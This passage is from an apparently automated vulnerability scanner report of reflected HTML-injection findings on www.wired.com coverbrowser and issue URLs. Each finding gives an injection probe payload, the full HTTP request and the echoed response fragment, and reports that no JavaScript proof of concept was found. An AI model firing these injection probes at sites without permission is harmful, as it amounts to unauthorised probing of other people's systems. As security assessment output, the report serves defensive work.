This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/2004c4001"><a>2a88692267f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Mon, 22 Nov 2010 01:11:43 GMT
Date: Mon, 22 Nov 2010 01:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_2004c4001"><a>2a88692267f">
...[SNIP]...

1.1317. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2005

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b232f"><a>d682f6a1f4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowserb232f"><a>d682f6a1f4b/2005 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Mon, 22 Nov 2010 01:11:13 GMT
Date: Mon, 22 Nov 2010 01:07:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowserb232f"><a>d682f6a1f4b c_2005">
...[SNIP]...

1.1318. http://www.wired.com/wired/coverbrowser/2005 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2005

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb267"><a>d1977a34166 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/2005eb267"><a>d1977a34166 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:02 GMT
Date: Mon, 22 Nov 2010 01:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_2005eb267"><a>d1977a34166">
...[SNIP]...

1.1319. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2006

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bcac"><a>862b8130889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser8bcac"><a>862b8130889/2006 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Mon, 22 Nov 2010 01:11:12 GMT
Date: Mon, 22 Nov 2010 01:07:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser8bcac"><a>862b8130889 c_2006">
...[SNIP]...

1.1320. http://www.wired.com/wired/coverbrowser/2006 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2006

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6534"><a>0bc59f3675f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/2006d6534"><a>0bc59f3675f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=221
Expires: Mon, 22 Nov 2010 01:11:44 GMT
Date: Mon, 22 Nov 2010 01:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_2006d6534"><a>0bc59f3675f">
...[SNIP]...

1.1321. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2007

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6336"><a>1e75e0fc687 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowserf6336"><a>1e75e0fc687/2007 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=218
Expires: Mon, 22 Nov 2010 01:11:02 GMT
Date: Mon, 22 Nov 2010 01:07:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowserf6336"><a>1e75e0fc687 c_2007">
...[SNIP]...

1.1322. http://www.wired.com/wired/coverbrowser/2007 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2007

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e5b"><a>ed4954956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/200780e5b"><a>ed4954956 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29360
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:01 GMT
Date: Mon, 22 Nov 2010 01:08:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_200780e5b"><a>ed4954956">
...[SNIP]...

1.1323. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2008

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72ece"><a>46b8f298938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser72ece"><a>46b8f298938/2008 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Mon, 22 Nov 2010 01:11:03 GMT
Date: Mon, 22 Nov 2010 01:07:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser72ece"><a>46b8f298938 c_2008">
...[SNIP]...

1.1324. http://www.wired.com/wired/coverbrowser/2008 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2008

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8cfb"><a>82e0732bfb6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/2008b8cfb"><a>82e0732bfb6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Mon, 22 Nov 2010 01:12:01 GMT
Date: Mon, 22 Nov 2010 01:08:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_2008b8cfb"><a>82e0732bfb6">
...[SNIP]...

1.1325. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2009

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f096d"><a>05f757fa8c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowserf096d"><a>05f757fa8c9/2009 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Mon, 22 Nov 2010 01:11:07 GMT
Date: Mon, 22 Nov 2010 01:07:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowserf096d"><a>05f757fa8c9 c_2009">
...[SNIP]...

1.1326. http://www.wired.com/wired/coverbrowser/2009 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/2009

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f59a"><a>29622920453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/20095f59a"><a>29622920453 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:11:58 GMT
Date: Mon, 22 Nov 2010 01:07:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_20095f59a"><a>29622920453">
...[SNIP]...

1.1327. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3559f"><a>424f9e8e273 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue3559f"><a>424f9e8e273/15-06/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=238
Expires: Mon, 22 Nov 2010 01:11:11 GMT
Date: Mon, 22 Nov 2010 01:07:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue3559f"><a>424f9e8e273 c_15-06">
...[SNIP]...

1.1328. http://www.wired.com/wired/issue/15-06/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-06/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c00d"><a>15f409df6f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/15-063c00d"><a>15f409df6f7/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Mon, 22 Nov 2010 01:11:44 GMT
Date: Mon, 22 Nov 2010 01:07:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_15-063c00d"><a>15f409df6f7">
...[SNIP]...

1.1329. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458e2"><a>0f61dc79ea2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue458e2"><a>0f61dc79ea2/15-07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Mon, 22 Nov 2010 01:09:46 GMT
Date: Mon, 22 Nov 2010 01:05:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue458e2"><a>0f61dc79ea2 c_15-07">
...[SNIP]...

1.1330. http://www.wired.com/wired/issue/15-07/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-07/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e036a"><a>caa87d80c1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue/15-07e036a"><a>caa87d80c1e/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29353
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:10:36 GMT
Date: Mon, 22 Nov 2010 01:06:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue c_15-07e036a"><a>caa87d80c1e">
...[SNIP]...

1.1331. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de8c"><a>8e425fd640 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/issue1de8c"><a>8e425fd640/15-08/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29351
Vary: Accept-Encoding
Cache-Control: max-age=221
Expires: Mon, 22 Nov 2010 01:09:02 GMT
Date: Mon, 22 Nov 2010 01:05:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_issue1de8c"><a>8e425fd640 c_15-08">
...[SNIP]...

1.1332. http://www.wired.com/wired/issue/15-08/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/issue/15-08/

Issue detail

